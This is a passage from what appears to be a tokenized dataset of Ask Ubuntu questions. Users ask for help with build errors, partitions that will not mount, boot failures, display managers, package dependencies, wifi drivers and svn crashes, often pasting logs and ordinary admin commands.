qlc+ at this point , i tried modifying the ubuntu.desktop file to contain the following : [ desktop entry ] type=application exec=startx terminal=false name=wscc lighting console it seems like i am almost there , but i am missing something . any help would be appreciated ! thanks in advance !
512642	building xvidcap on ubuntu 14.04 - undefined reference to symbol 'xgetwindowattributes '	i 'm trying to build xvidcap from sources on ubuntu 14.04 since no package is available . i 've stumbled upon following error during make : gcc -wall -g -ddbus_service_dir=\ '' '' /usr/local/share/dbus-1/service '' \ '' -g -o2 -pthread -i /home/jesper/xvidcap-1.1.7 -i/home/jesper/xvidcap-1.1.7/ffmpeg/libavcodec -i/home/jesper/xvidcap-1.1.7/ffmpeg/libavformat -i/home/jesper/xvidcap-1.1.7/ffmpeg/libavutil -i/home/jesper/xvidcap-1.1.7/ffmpeg/libswscale -i/home/jesper/xvidcap-1.1.7/ffmpeg/libavdevice -export-dynamic -l/home/jesper/xvidcap-1.1.7/ffmpeg/libavcodec -l/home/jesper/xvidcap-1.1.7/ffmpeg/libavformat -l/home/jesper/xvidcap-1.1.7/ffmpeg/libavutil -l/home/jesper/xvidcap-1.1.7/ffmpeg/libswscale -l/home/jesper/xvidcap-1.1.7/ffmpeg/libavdevice -o xvidcap app_data.o capture.o codecs.o colors.o frame.o gnome_frame.o gnome_ui.o gnome_warning.o gnome_options.o led_meter.o main.o options.o xtoffmpeg.o xtoxwd.o job.o xvc_error_item.o eggtrayicon.o -pthread -lglade-2.0 -lgtk-x11-2.0 -lxml2 -lgdk-x11-2.0 -latk-1.0 -lgio-2.0 -lpangoft2-1.0 -lpangocairo-1.0 -lgdk_pixbuf-2.0 -lcairo -lpango-1.0 -lfontconfig -lgobject-2.0 -lfreetype -lgthread-2.0 -lglib-2.0 -wl , -bstatic -lavcodec -wl , -bdynamic -wl , -bstatic -lswscale -wl , -bdynamic -wl , -bstatic -lavutil -wl , -bdynamic -lm -lxdamage -lxfixes -lxmu /usr/bin/ld : frame.o : undefined reference to symbol 'xgetwindowattributes' //usr/lib/x86_64-linux-gnu/libx11.so.6 : error adding symbols : dso missing from command line how can i fix this ?
512643	fonts displayed at larger size in documents compared to windows	i use libreoffice both at home and at work . unfortunately at work i use it under windows , at home ubuntu . often i have to work on documents ( especially ppt ) started under windows . trouble is ubuntu seems to display fonts as bigger ( i.e . a sentence using font size 18 fits in a line under windows , but under ubuntu , using the same font and size it does not , which breaks formatting ) . is there any way to make the font size display consistent between the two systems ?
512644	ubuntu partition `` unallocated '' and win7 bsods	i 've successfully used boot repair to get out of booting binds in the past , but this time i 'm stuck and was directed by boot repair to share the following web address in a trusted forum such as this : http : //paste2.org/izvkl8uz ( this shows details of what boot repair did and found on my system ) in case some additional information might be helpful , the problem arose after windows crashed and did some kind of registry defragmentation when restarted . that led to multiple bsods with error messages like this : problem detected and windows shut down to prevent damage win32k.sys page_fault_in_nonpaged_area make sure any new hardware or software is properly installed ... if problems continue , disable or remove newly installed hardware or software ... disable bios memory options ( but there was no newly installed hardware or software that i 'm aware of ) that was followed by the following error message error : no such partition grub rescue > using boot repair , i got back to the bsod and the associated error messages listed above , but now i 'm stuck there again . using gparted , i see that where my ubuntu partition should be there now seems to be only `` unallocated '' space . any ideas about what 's happened and what i might try ? thanks . -- brian
512645	ubuntu 14.04 can not start after execute command 'sudo apt-get install gtk+- ' and shutdown laptop	well , a little while ago , i was installing a serie of apps , and one requirement was to have installed gtk+ 3.4 , next , as can be expected , i googled how to install it and ... i executed the command 'sudo apt-get install gtk+- ' , and surprisingly , i noticed that the icons in the unity 's launcher begin to disappear one after another , and my first reaction was `` what the f ... is going here '' , and quickly , i saw the process in the terminal , and this was removing a lot of apps , when i killed the process was very late , while , the apps still was dissapearing , and also , some built-in apps that comes with ubuntu were removed , for example when i opened a terminal , its appeareance was more primitive , later , i shut down my laptop , then i turned it on , and the login screen does n't appear ... .just loading ... . i looked for some hints but i found not much literature : http : //ubuntuforums.org/showthread.php ? t=1673407 and it does not seem a `` core '' thing http : //es.wikipedia.org/wiki/gtk % 2b some help to not repeat this in the future would be fine ... : d pd : if someone has a virtualbox with ubuntu i would be very thankful of to test the mentioned command .
512646	`` hadoop version '' getting error	i 'm trying to install hadoop 2.4 & jdk8 on ubuntu14.04 . i 'm following the links : http : //codesfusion.blogspot.com/2013/10/setup-hadoop-2x-220-on-ubuntu.html i 've followed carefully above the configuration section & got expected result . but when i try this hduser @ rony-laptop : ~ $ hadoop version /usr/lib/jvm/jdk//bin/java : error while loading shared libraries : libjli.so : can not open shared object file : no such file or directory i think this might help : http : //paste.ubuntu.com/8073976/ . please guide me to solve the problem . thanks in advance .
512647	ubuntu 14.04 volume buttons do n't work properly	i recently upgraded to ubuntu 14.04 and now the three volume buttons ( increase , decrease , mute ) on my laptop ( lenovo t400 ) do n't work properly . after reboot they work fine , but after some hours ( can not really say when it starts to change , since i do n't use those buttons all the time ) they just do n't respond anymore . i can adjust the volume manually by clicking on the volume symbol in the upper right corner , but the shortcuts seem to be disabled . does anyone else has this problem , or does anyone know a way to fix it ?
512648	how to make torque work on ubuntu 14.04 ?	i have a single pc with a multicore processor and i 'm trying to use torque on ubuntu 14.04 . i have installed torque-mom , torque-server , torque-client and torque-scheduler through synaptic . i ca n't make it work . i have changed server name and even ip . i ca n't find specific instructions which can be correctly applied . the official torque application is not prepared to work with ubuntu . i 'm really tired handling this . what will make it work ?
512649	ownership issue	i 've three partitions , the first is the file system , the second for swap area and the third for my documents . i ca n't access the third one , it say `` you are n't the owner '' . how can access my partition . even ca n't make new folder .
512650	targetting boost 32-bit while on 64-bit ubuntu ?	well i have libboost-all-dev installed , but i am trying to compile for 32-bit . i ca n't install libboost-all-dev : i386 either . g++ -lboost_filesystem main.cpp g++ -m32 -lboost_filesystem main.cpp the second command throws an error , that boost_filesystem ca n't be found , but the first one compiles fine . is there any way around this , or do i have to manually build boost ?
512654	where does the software in the repositories come from ?	where does the software in the main repositories come from ? by `` main repositories '' i mean the default repositories used when you install ubuntu from a fresh iso , and by this i also include all the disabled sources from the same origin , such as universe , restricted , and multiverse . and by `` come from '' , i mean is the available software chosen or voted on to ensure no one sneaks in any malware , or can anyone contribute to and get their library or software into the main repositories ?
512656	ubuntu 14.04 upgrade problem	yesterday i decided to do the upgrade . little did i know , i got a black out , the upgrade was interrupted and the rest is history . now i am facing the following issues : 1 ) no gui when i open up the pc i am presented with the terminal , i log in every file seems in place but no gui . seems that unity is not installed . i try to install it but then i bumb up to the second error 2 ) no internet connectivity ( wired and wireless ) . when on ifconfig -a i only get lo . i downloaded the drivers , compiled them but still no luck . really need your help on this . laptop lenovo g550 broadcom bcm4312 realtek rtl8101e
512659	ca n't access drive	so long story short ... i removed windows 8 from my computer and installed ubuntu . when i went to open up my secondary drive ( contains all my files from when i had windows 8 ) i get this error in ubuntu error mounting /dev/sdb2 at /media/ivan/black drive : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb2 '' `` /media/ivan/black drive '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdb2 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . from what i read some people recommend booting into windows 8 and disabling fast start up ... but how do i do this if i do n't have windows 8 anymore ?
512662	ram not recognized	i have an hp 255g1 laptop with linux preinstalled . it came with 2 gb ram and as of late i installed another ( hp certified ) memory module , and now i should have 4 gb ram bios sees it , memory test tool ( from bios ) flags it ok , i even tried windows installation , and it 's ok. ubuntu 12.04 64bit in system settings says i have only 1.6gib which was the result when i first bought the laptop . i have not seen any difference in performance . can you help me see if this can be resolved ? did a little reading in previous questions posted here , but with no luck ... i am new to linux ...
512664	starting gdm ( manually or during boot ) does n't do anything	at my wit 's end here ! i ca n't get gdm to run . not just not at boot-time , but at all . there 's no error message . tty7 stays blank . it does n't seem to attempt to start an x server . it does n't log anything in /var/log/gdm or /var/log/xorg.0.log ( anywhere else i should look ? ) . $ sudo start gdm gdm start/running , process 17747 $ sudo start gdm gdm start/running , process 17769 $ sudo start gdm gdm start/running , process 17791 $ sudo stop gdm stop : unknown instance : i 've purged gdm , installed gdm , reinstalled gdm with -f and -m for good measure , wiped /usr/share/gdm , /etc/gdm , /etc/dconf/db/gdm.d and even ~/.config/dconf/user ... nothing ! upgrading to 14.10 did n't help , either . running the gdm binary itself starts up some sort of miniature gnome-shell with nothing to do . gnome-shell itself works fine with lightdm ... minus the screen lock functionality , which i want . besides , it just bothers me that something does n't work . : ăž i 'm having this issue on a regular desktop as well as an eee pc 1215 n with intel/nvidia hybrid graphics . both have kde in addition to gnome-shell . ( well , i reinstalled the eee pc with elementary os yesterday ) . update : sudo start gdm says `` gdm start/running '' and provides a pid even with the gdm binary itself removed .
512666	how to clone an ubuntu system using the package manager ?	i would like some way to exactly duplicate what is installed on one ubuntu system , onto another , regardless of the target system 's state , using the package manager . this includes : installing the same version of any package on the target that is installed on the source , removing any package on the target that is not installed on the source , if there are any broken packages on the target blowing them away and reinstalling , ignoring any pre/post uninstall script errors , etc . basically , as long as apt-get or dpkg runs and there is a way to log into the target system , this should succeed and produce a clone of the source system . i want to do this without imaging the drive : for one , that is not the easiest thing to do on an already running system ; for another , is n't this the whole point of package management ? there is a suggested way of doing this here : http : //linuxprograms.wordpress.com/2010/05/13/dpkg-set-selections-clone/ in a nutshell : ( on source ) dpkg -- get-selections > packages_list ( on target ) dpkg -- set-selections < packages_list apt-get -u dselect-upgrade however , that fails in several ways : one , it flat out fails if there are any broken packages on the target , and two , it just tries to get the same packages but not the same versions . if the source had something installed by specifying a specific distro by hand ( like apt-get install mypkg/wheezy-backports ) then that info is not reflected in -- get-selections ( or if there are different pinned version , etc ... ) .
512670	unable to fix dependency error	i can not update and install any software . i 've tried apt-get -f install and some other methods as suggested in this site but none of them worked . prios @ shrsth : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : libudev1 : i386 the following packages will be upgraded : libudev1 : i386 1 upgraded , 0 newly installed , 0 to remove and 24 not upgraded . 11 not fully installed or removed . need to get 34.2 kb of archives . after this operation , 0 b of additional disk space will be used . do you want to continue ? [ y/n ] y get:1 http : //np.archive.ubuntu.com/ubuntu/ trusty-updates/main libudev1 i386 204-5ubuntu20.4 [ 34.2 kb ] fetched 34.2 kb in 1s ( 29.3 kb/s ) ( reading database ... 170562 files and directories currently installed . ) preparing to unpack ... /libudev1_204-5ubuntu20.4_i386.deb ... unpacking libudev1 : i386 ( 204-5ubuntu20.4 ) over ( 204-5ubuntu20.3 ) ... dpkg : error processing archive /var/cache/apt/archives/libudev1_204-5ubuntu20.4_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libudev1/changelog.debian.gz ' , which is different from other instances of package libudev1 : i386 errors were encountered while processing : /var/cache/apt/archives/libudev1_204-5ubuntu20.4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
512673	why does system istallation fail on 32-bit windows machine ?	when trying to install the 32 bit desktop windows version , installation is denied because a key file is already in use as per the error log file , wubi-14.04-rev286.log . the relevant information is shown below . all other programs are closed when running the installation file . what can be done to enable installation ? traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\btdownloader.py '' , line 78 , in download file `` \lib\bittorrent\download.py '' , line 303 , in download file `` \lib\bittorrent\rawserver.py '' , line 256 , in listen_forever file `` \lib\wubi\backends\common\btdownloader.py '' , line 69 , in error_callback downloaderror : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 229 , in listen_forever file `` \lib\wubi\backends\common\btdownloader.py '' , line 69 , in error_callback downloaderror : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 221 , in listen_forever file `` \lib\bittorrent\rerequester.py '' , line 90 , in add file `` \lib\bittorrent\rerequester.py '' , line 105 , in postrequest file `` \lib\wubi\backends\common\btdownloader.py '' , line 69 , in error_callback downloaderror : rejected by tracker - requested download is not authorized for use with this tracker . 08-17 22:02 error tasklist : non fatal error traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 229 , in listen_forever file `` \lib\wubi\backends\common\btdownloader.py '' , line 69 , in error_callback downloaderror : traceback ( most recent call last ) : file `` \lib\bittorrent\rawserver.py '' , line 221 , in listen_forever file `` \lib\bittorrent\rerequester.py '' , line 90 , in add file `` \lib\bittorrent\rerequester.py '' , line 105 , in postrequest file `` \lib\wubi\backends\common\btdownloader.py '' , line 69 , in error_callback downloaderror : rejected by tracker - requested download is not authorized for use with this tracker . in task download 08-17 22:02 debug tasklist : # # # finished download 08-17 22:02 error root : could not remove : e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso traceback ( most recent call last ) : file `` \lib\wubi\backends\common\backend.py '' , line 426 , in download_iso oserror : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\ubuntu-14.04-desktop-amd64.iso' 08-17 22:02 debug tasklist : new task download 08-17 22:02 debug tasklist : # # # running download ... 08-17 22:02 debug downloader : downloading http : //mirror.vutbr.cz/ubuntu/releases/14.04.1/ubuntu-14.04-desktop-amd64.iso > e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso 08-17 22:02 debug downloader : download start filename=e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso , url=http : //mirror.vutbr.cz/ubuntu/releases/14.04.1/ubuntu-14.04-desktop-amd64.iso , basename=ubuntu-14.04-desktop-amd64.iso , length=1010827264 , text=none 08-17 22:28 debug tasklist : # # # finished download 08-17 22:28 debug downloader : download finished ( read 1010827264 bytes ) 08-17 22:28 debug tasklist : new task check_iso 08-17 22:28 debug tasklist : # # # running check_iso ... 08-17 22:28 debug commonbackend : checking e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso 08-17 22:28 debug distro : checking ubuntu iso e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso 08-17 22:28 error windowsbackend : error executing command > > command=e : \docume~1\owner\locals~1\temp\pyl49.tmp\bin\7z.exe l e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso > > retval=2 > > stderr= 7-zip 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 error : e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso : the process can not access the file because it is being used by another process . errors : 1 > > stdout= traceback ( most recent call last ) : file `` \lib\wubi\backends\win32\backend.py '' , line 519 , in get_iso_file_names file `` \lib\wubi\backends\common\utils.py '' , line 66 , in run_command exception : error executing command > > command=e : \docume~1\owner\locals~1\temp\pyl49.tmp\bin\7z.exe l e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso > > retval=2 > > stderr= 7-zip 9.20 copyright ( c ) 1999-2010 igor pavlov 2010-11-18 error : e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso : the process can not access the file because it is being used by another process . errors : 1 > > stdout= 08-17 22:28 debug windowsbackend : command > > e : \docume~1\owner\locals~1\temp\pyl49.tmp\bin\7z.exe l e : \ubuntu\install\ubuntu-14.04-desktop-amd64.iso 08-17 22:28 debug distro : does not contain casper\filesystem.squashfs 08-17 22:28 debug tasklist : # # # finished check_iso 08-17 22:28 error tasklist : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\ubuntu-14.04-desktop-amd64.iso' traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 441 , in download_iso oserror : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\ubuntu-14.04-desktop-amd64.iso' 08-17 22:28 debug tasklist : # cancelling tasklist 08-17 22:28 debug tasklist : # finished tasklist 08-17 22:28 error root : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\ubuntu-14.04-desktop-amd64.iso' traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 595 , in get_iso file `` \lib\wubi\backends\common\backend.py '' , line 441 , in download_iso oserror : [ errno 13 ] permission denied : u'e : \\ubuntu\\install\\ubuntu-14.04-desktop-amd64.iso'
512674	how does the ubuntu live cd check itself for defects ?	one of the options when you boot up the cd is to check itself for defects . how does it do this ? surely there could be a defect that gives a false positive ? or is that incredibly unlikely - does it use some sort of hash ?
512675	ubuntu 14.04 clear list of recent files in dash	how to disable or clear list of recent files in ubuntu unity dash ? i can find many ways to do so in older version of ubuntu but none of them work in 14.04 .
512677	how do i get rid of the password promting in the terminal ?	i am new to ubuntu and i have a looot of issues : ) ) ! i saw that many things can be solved by typing commands in that window , terminal , which is kinda new to me ( i am windows 7 user , not a developer ) . moving to the point , whenever i try to type commands in the terminal , it is prompting me to type the password . firstly : which password , since i deactivated typing the password at logon . maybe it 's the same : - ? ... secondly , i ca n't get to type it all , because it tells me : `` sorry , try again . '' and the 3 password attempts thing . so , i googled it a little and i found that it 's a textexpander problem . what is that , and how can it be solved ? i going crazy , since i ca n't enter a single command without that annoying password prompt . thanks a lot guys , and wait for me , i 'm gon na ask a lot of questions , since i found this site is made especially for this ! ; ) )
512678	the xserver config file is not found	i have recently purchased a new discrete gpu and have to configure the xserver . in a forum i found the advise first to back-up the config-file like that : sudo cp /etc/x11/xorg.conf /etc/x11/xorg.conf.bak but it just puts out the error : file or directory not found so if i can not back-up the file how should i open and configure it ? please help ! i am using ubuntu 14.04 64-bit , with an amd kaveri-apu with 16gb ram . the gpu i want to get to work in my system is the amd r9-280 .
512680	ca n't move windows around	ubuntu desktop ( on a laptop ) 14.04 lts x64 6 gb ram intel i5 500 gb disk after fixing my broken desktop session where the `` launcher '' dissapeared ( no launcher or menu ) i can no longer move windows around . if i have several terminals up , i ca n't grab the title bars and move them . it would seem i can resize them but i ca n't move them . i can maximize , minimize and close but they 're stuck where they are for the most part . sometimes i like to manually tile my windows . this does n't work ( alt+spacebar ( move ) ) : ca n't move a window in unity ( it 's stuck ) ! i have another session that i created because the first one was broken and used that for months until i finally found that launcher fix . now i 'm back in but this piece is broken , a bit irritating but i can live with it for now ... it 's better than nothing ! anyone else have this issue ?
512681	repeating ui after installing ati drivers	so first off i want to say thanks for the help in advance and that even though this is n't strictly ubuntu i imagined you guys would be able to help . so in i 've recently installed amd drivers to my system ( fglx i believe ) . i have a 3 monitor setup and it works for the most part but the menu and time and task bar all repeat on the main screen 4 times right next to each other . i 'll be able to provide anything you guys need and again i appreciate the help .
512682	enlarging with convert ( imagemagick ) without bluring ?	i want to scale an image to 200 % without bluring it . so i want to make every pixel to a two by two pixel . how can i do that ?
512684	uncompression error when install ubuntu	i get a uncompression error when blotting from an ubuntu livecd . my hard disk got corrupted and buying a new system is not an option at the moment , so i need to install ubuntu on the machine to get it working . the livecd is an usb that was just formatted using universal usb insatller . the md5 checksums match and i 've tried it two times . note : i can not buy any new hardware or any software for that matter . thank you .
512691	soooo confused and want windows 7 back on my machine	let me first start by saying i do not know anything about linux/ubuntu ... an ex-friend put it on my computer and then it died for a few months due to a bad power supply , and i just got it back up and running . needless to say i do n't like it , ca n't figure it out , and it wo n't go past the welcome screen that says `` try ubuntu or install ... '' if i try to install it i get errors . so i went out and bought windows 7 and tried to install it . and even though it 's showing that there is a cd-rom drive attached to the computer -- an internal and an external apple super slim -- still it will not read the disk . please someone tell me how to get ubuntu off my computer and back to windows i 've tried to go into the setup when the computer starts with f10 and change it to boot from cd-romm : but nothing . i 've trying to start from a floppy start up windows xp disk : nothing . please give an instruction on how to install windows over ubuntu .
512692	mount internal drive in ubuntu livecd-mount error	i am trying to access my disk in an ubuntu livecd . i can not see my disk in nautilus and am trying to mount it . sudo fdisk -l gets this : disk /dev/sda : 80.0 gb , 80026361856 bytes 255 heads , 63 sectors/track , 9729 cylinders , total 156301488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007c70c device boot start end blocks id system /dev/sda1 * 2048 147937279 73967616 83 linux /dev/sda2 147939326 156301311 4180993 5 extended /dev/sda5 147939328 156301311 4180992 82 linux swap / solaris disk /dev/sdb : 1999 mb , 1999634432 bytes 16 heads , 32 sectors/track , 7628 cylinders , total 3905536 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 * 8064 3905535 1948736 c w95 fat32 ( lba ) then : dmesg | grep disk gets : [ 5.522888 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 8.579151 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk i tried : sudo mount /dev/sda1 /mnt/disk but i get this error : mount : you must specify the filesystem type what do i do ? thank you in advance . edit : sudo mount -t ext4 /dev/sda1 /mnt/disk gets : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so so i tried : dmesg | tail it gets : [ 2812.431548 ] squashfs error : ca n't find a squashfs superblock on sda5 [ 2812.432671 ] xfs ( sda5 ) : bad magic number [ 2812.432688 ] xfs ( sda5 ) : sb validate failed with error 22 . [ 2812.539235 ] ntfs driver 2.1.30 [ flags : r/o module ] . [ 2812.563827 ] qnx4 filesystem 0.2.3 registered . [ 2829.043992 ] systemd-hostnamed [ 18714 ] : warning : nss-myhostname is not installed . changing the local hostname might make it unresolveable . please install nss-myhostname ! [ 3083.379348 ] ext4-fs ( sda1 ) : vfs : ca n't find ext4 filesystem [ 3096.843383 ] ext4-fs ( sda1 ) : vfs : ca n't find ext4 filesystem [ 3141.671012 ] ext4-fs ( sda2 ) : unable to read superblock [ 3328.134796 ] ext4-fs ( sda1 ) : vfs : ca n't find ext4 filesystem edit 2 : trying ext4 and ext3 gets me the same results : sudo mount -t ext3 /dev/sda1 /mnt/disk so does /dev/sda2 and /dev/sda5 sudo mount -t ext4 /dev/sda2 /mnt/disk sudo mount -t ext3 /dev/sda2 /mnt/disk sudo mount -t ext4 /dev/sda2 /mnt/disk sudo mount -t ext3 /dev/sda2 /mnt/disk edit 3 : it 's been a while now , i 'm going to send the computer to a repair shop soon . what should i do . i 've been trying to mount it from a friend 's system . no success .
512693	data loss on crash during ubuntu upgrading 12.04 to 14.04 on dual boot pc	while upgrading ubuntu 12.04 to 14.04 i had a crash . when i try to boot from ubuntu ( i have dual boot -ubuntu vista 7- sony vaio laptop ) i get the following messages : target filesystem does n't have requested /sbin/init/ no init found . try passing init=bootarg busybox v.1.21.1 built in shell ( ash ) initramfs _ i can still boot from windows 7 but i seem not able to recover the data on ubuntu partition from there . ubuntu partition is 15 giga . is it there a way to recover the data on ubuntu partition ? thanks in advance for help
512696	how to fix black screen after update ?	today i started up my ubuntu 14.04 computer and everything worked normally . i saw that i had an update for ubuntu base and decided to go ahead and do it . after downloading/installing completed , i restarted , and that 's when the problem arose . the computer started normally , but after the ubuntu logo did its `` dot '' thing the screen went black . i left it for a while but it never fixed itself . i rebooted it several times yet it refused to get past the black screen after the dots . i went into grub and tried starting from a previous kernel , but it did n't work . i got a live cd to get my personal data , but i would prefer not to redownload my drivers . can anyone help me ? thanks in advance : )
512697	is ubuntu 14.04 slower on low-end graphics cards than 12.04 lts ?	i started upgrading to ubuntu 14.04 ( from 12.04 ) when it said that if i installed it , it might make me have a `` slow environment '' because of my graphics card . i cancelled the upgrade because of my computer , that could be a very distinct possibility . i am using an acer c720 chromebook dual booted with ubuntu 12.04 unity . i have very little programming and ubuntu experience , i have only been using it for 2 months . should i upgrade from 12.04 lts to 14.04 ?
512698	how to change the default position of ~/.ssh/authorized_keys	my vm server is installed ubuntu 12.04 and connected to a storage ( not sure about the system of this storage ) . i have change my home directory to the storage . however this storage could be assessed by a domain group with write permission ( i can not change it ) . it could be dangerous if i put my keys where other people can view it . btw : it seems the authorized_keys can not be red from my new location ~/.ssh/authorized_keys ( i still need to type my password every time ) . how could i change the ~/.ssh/authorized_keys to another place ? thanks for any advice . please let me know if my question is not clear .
512704	after 14.04 update video/totem wo n't play midi	prior to the upgrade , i could be on wikipedia and play the 'play ' links fine where totem would open a window and have screen graphics go on . now , after researching , installing vlc and it 's extensions , making sure the gnome codec installer is activated , and on and on , all i get is : '' the parameters passed to the application had an invalid format . please file a bug ! the parameters were : -- transient-for=16777296 gstreamer|1.0|totem-plugin-viewer|audio/x-midi-event decoder|decoder-audio/x-midi-event '' when totem/video opens and i 'm not sure whether the bug is being reported or not . meaning i do n't know if apport is active for this as there 's no box with a checkmark in it display . and the window for totem/video always has the sound muted when it opens .
512707	tracking ip 's that access the server ?	i am running ubuntu 12.04 with ispconfig and smf forums i would like to keep a log of all the ip 's that are accessing the server what would be the best / easiest method to do so ? ( not a linux guru , so something gui would be nice . i know wordpress had a decent ip log with it , but i am not using it on this server )
512708	installing newer version of ubuntu alongside older one	i had or have had on my computer ubuntu 13.04 . i 've just made a bootable cd with the latest version of ubuntu . did boot with the cd and then selected something else in the installation menu . then i just created a new partition table and created root and swap and let it install the new version . now , i can not access the partition i could access with the old ubuntu and i ca n't access old ubuntu either . i think i have the find the old partition table ( i suppose that 's the information regarding the old partition , i suppose ) . tried the command sudo gpart /dev/sda it gives me back `` begin scanning '' ( it stayed like that for 10 minutes now ) how do i access my partitions and old ubuntu ?
512712	how can i install a theme from github	i saw this theme around the web and i liked it a lot . https : //github.com/baurigae/polar-night but i 'm a newbie on ubuntu/linux , and i have no idea how to install it . can somebody help me ?
512713	installing wine	the ubuntu 14 repository includes 3 wine packages . the third one says the first two must be removed before installing the third . is this because they need to be installed in the correct order or is it an either or situation where i need either the first two or only the third ?
512715	how to make sudo use a separate password ?	using ubuntu 14.04 , i have 2 accounts : account a ( first one set up ) with password 1 account b ( second set up ) with password 2 , when updating software in account b , i use password 1 to authenticate . has been successful so far . how do i set up sudo with its own password , and then run sudo apt-get clean ?
512719	how to install collabnet subversion edge 4.0.10 in ubuntu 14.04 ?	can anyone tell me the procedure to install collabnet subversion edge 4.0.10 on ubuntu 14.04 ? i am new to ubuntu .
512727	how to install driver for tp-link tl-wn722n on ubuntu 14.04 ?	hi i am new to ubuntu and linux . as i am developing a wifi product , i want to capture the wifi traffic wirelessly with wireshark . having some searching in the web , i know that i can do that with a usb wifi adapter and ubuntu . then i can run the wireshark in real monitor/promiscuous mode . ok so i bought a tp-link tp-wn722nc ( i want to buy the tp-wn722n at first , but the store only has this model ) . also i found a laptop and installed the ubuntu 14.04.1 . then i noticed that i need a driver for this adaptor . so i try to follow the blog post installing tl-wn722n on ubuntu 11.10 to install the driver ath9k_htc but seems it was not successful . then i downloaded the backports 3.16-1 by running these two commands : wget https : //www.kernel.org/pub/linux/kernel/projects/backports/stable/v3.16/backports-3.16-1.tar.gz tar xvf compat-wireless-2.6.38.2-2.tar.bz2 however , after that point do not know what should i do . could you help guide me to install the correct driver ?
512729	how to upgrade from ubuntu 13.04 to 13.10 or 14.04 ?	i have my staging server that is running on ubuntu 13.04 and my local machine which is running on 13.10 . every time i try to do either sudo apt-get update sudo apt-get install ( anything ) it works fine on my local machine , but it gives me 404 ip address not found on my staging instance which is running on 13.04 , and update/install fails . i have lot of important folders and sites running on that instance . is there any way i can do an upgrade from 13.04 to 13.10/14.04 for my staging instance . any help appreciated .
512730	dual-booting ubuntu 14.04 with win 7 on a raid 0	i 'm trying to install ubuntu 14.04 to dual-boot with my windows 7 in a raid 0 array of 2 120gb ssds , but i 'm having some problems . i had to reinstall windows 7 and created a partition for it , with the remaining volume ( unallocated ) being dedicated to the ubuntu partition . the ubuntu installer , however , does n't recognize that partition as free space - in fact , all it does is recognize the entire volume of 240gb from the raid 0 , not being able to see the partitions . how do i proceed in this situation ? i have an hdd here , but i wanted to install ubuntu on my ssds because of the performance .
512733	ubuntu svn checkout random failed	using buildbot to run some test . the svn step random failed , the error messages like : svn : e140001 : zlib ( uncompress ) : corrupt data : decompression of svndiff data failed or svn : malformed xml : not well-formed ( invalid token ) at line 15052 or svn : decompression of svndiff data failed all this happedn random , which part should have i checked ? it also happend when update svn to 1.8.9 . and some time the svn was killed by single 11 . traceback like : # 0 0x00007fee164e0cc1 in apr_pool_destroy ( ) from /usr/lib/libapr-1.so.0 ( gdb ) bt # 0 0x00007fee164e0cc1 in apr_pool_destroy ( ) from /usr/lib/libapr-1.so.0 # 1 0x00007fee164e0c00 in apr_pool_destroy ( ) from /usr/lib/libapr-1.so.0 # 2 0x00007fee15686db5 in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 3 0x00007fee15688026 in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 4 0x00007fee1568a51d in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 5 0x00007fee1568c9cc in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 6 0x00007fee152366f4 in ? ? ( ) from /lib/x86_64-linux-gnu/libexpat.so.1 # 7 0x00007fee15237951 in ? ? ( ) from /lib/x86_64-linux-gnu/libexpat.so.1 # 8 0x00007fee1523975d in xml_parsebuffer ( ) from /lib/x86_64-linux-gnu/libexpat.so.1 # 9 0x00007fee1568b944 in ? ? ( ) from /usr/lib/x86_64-linux-gnu/libsvn_ra_serf-1.so.1 # 10 0x00007fee1568d6cb in 